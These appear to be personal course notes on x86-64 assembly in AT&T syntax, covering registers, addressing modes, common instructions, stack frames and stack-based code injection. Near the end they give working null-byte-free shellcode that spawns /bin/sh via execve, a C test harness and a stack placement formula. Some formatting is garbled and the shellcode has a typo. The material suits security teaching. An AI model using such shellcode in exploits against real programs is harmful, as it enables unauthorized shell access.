We use x86 assembly, in AT&T notation (personal note: Intel is better for use though).
# for comments (Intel uses ;)Low-level, processor-specific symbolic language, directly translated to machine code.
Intructions: simple operations like mov %rax, %rbx (copies value from register rax to register rbx)
mnemonic source, destination (mnemonic is short code telling CPU what to do)%rax, %rsp, or %al
%rax, %rbx, %rcx, %rdx, %rsi, %rdi, %r8-%r15%rsp%rbp%rip%cs, %ds, %es, `%fs, etc.%eax (32-bit), %ax (16-bit), %ah (8 high bits of %ax), %al (low 8 bits of %ax)0x401000, 8(%rbp), (%rdx, %rcx, 4)
offset(base, index, scale)
offset+base+index*scalebase, index: 64-bit registers
%rip, symbolic displacement is relative to next instructionoffset: 32-bit constant or symbol, default 0scale: 1, 2, 4, or 8 (default 1)$ (e.g. $42)Directives: commands for assembler
.data: section with variables.text: section with code.byte/.word/.long/.quad: integer (8/16/32/64 bits).ascii/.asciz: outputs string (without/with null terminator)labels: create symbol at current address (foo: .byte 42 is similar to global char foo = 42)
comments: prefixed with #
Endianness: when storing an integer in memory, which byte is stored first
Signed integers:
Common instructions:
| example | meaning |
|---|---|
| mov src, dst | dst = src |
| xchg dst1, dst2 | swap dst1 and dst2 |
| push src | store src on top of stack |
| pop dst | remove value from top of stack and store in dst |
| add src, dst | dst += src |
| sub src, dst | dst -= src |
| inc dst | dst += 1 |
| dec dst | dst -= 1 |
| neg dst | dst = -dst |
| cmp src1, src2 | set flags based on src2-src1 |
| and src, dst | dst &= src |
| or src, dst | dst |= src |
| xor src, dst | dst ^= src |
| not dst | dst = ~dst |
| test src1, src2 | set flags based on src1 & src2 |
| jmp addr | jump to addr |
| call addr | push return address, call function addr |
| ret | pop return address, return there |
| syscall | enter kernel to perform system call (based on registers) |
| lea src, dst | dst = &src (src must be in memory) |
| nop | do nothing |
Conditional branching instructions (prepend ‘n’ to condition for opposite, e.g. jne)
| example | meaning |
|---|---|
| je addr; jz addr | jump if result == 0 |
| jb addr | jump if dst < src (unsigned) |
| ja addr | jump if dst > src (unsigned) |
| jl addr | jump if dst < src (signed) |
| jg addr | jump if dst > src (signed) |
| js addr | jump if result < 0 (signed) |
Stack:
%rsp%rsp%rsp by 8, pop increments %rsp by 8)%rdi, %rsi, %rdx, %rcx, %r8, %r9), other parameters on stack right-to-left (but note: this depends on calling convention)%rbp%rbp to %rsp%r12-%r15)%rsp to make space for local vars%rax%rsp to %rbp%rbpAssume we:
Where do we point return address?
x86 CPUs don’t distinguish code and data, so if memory permissions allow:
How do we inject code into program?
Injected code must:
User code can’t start program, kernel does that. So tell kernel to do something using a syscall:
Starting a shell:
execve("/bin/sh", argv, NULL), where char argv[] = { "/bin/sh", NULL}%rax register stores which system call to invoke, 0x3b is execvesyscall switch to kernel, result is stored in %rax after returnretq return to caller%rdi (program name)%rsi (argv)%rdx (envp)Shellcode:
.data
.globl shellcode
shellcode:
jmp code_start
string_addr:
.ascii "/bin/shNAAAAAAAABBBBBBBB"
code_start:
leq string_addr(%rip), %rdi # load the string into %rdi ('path' in execve), offset is negative to avoid null bytes
xorl %eax, %eax # clear %rax without using null bytes
movb %al, 0x07(%rdi) # replace "N" in string with null, use %rax to avoid explicit null
movq %rdi, 0x08(%rdi) # move program name to argv[0] in execve
movq %rax, 0x10(%rdi) # move null to argv[1] in execve, use %rax to avoid explicit null
leaq 0x08(%rdi), %rsi # load address of argv into %rsi
movq %rax, %rdx # load null into %rdx ('envp' in execve), use %rax to avoid explicit null
movb $0x3b, %al # load syscall number into %rax, 0x3b is execve, we already xored %rax so other bytes are zero
syscall # perform call 0x3b(%rdi, %rsi, %rdx)
.byte 0
Testing shellcode:
#include <stdio.h>
int main(int argc, char **argv) {
extern char shellcode;
void (*f)(void) = (void (*)(void)) &shellcode; // cast pointer to shellcode to function pointer to 'void shellcode(void)'
f();
fprintf(stderr, "this shouldn't print\n");
return -1;
}
Injecting the shellcode:
bottom_of_stack-8-(strlen(progname)+1)-(strlen(shellcode)+1))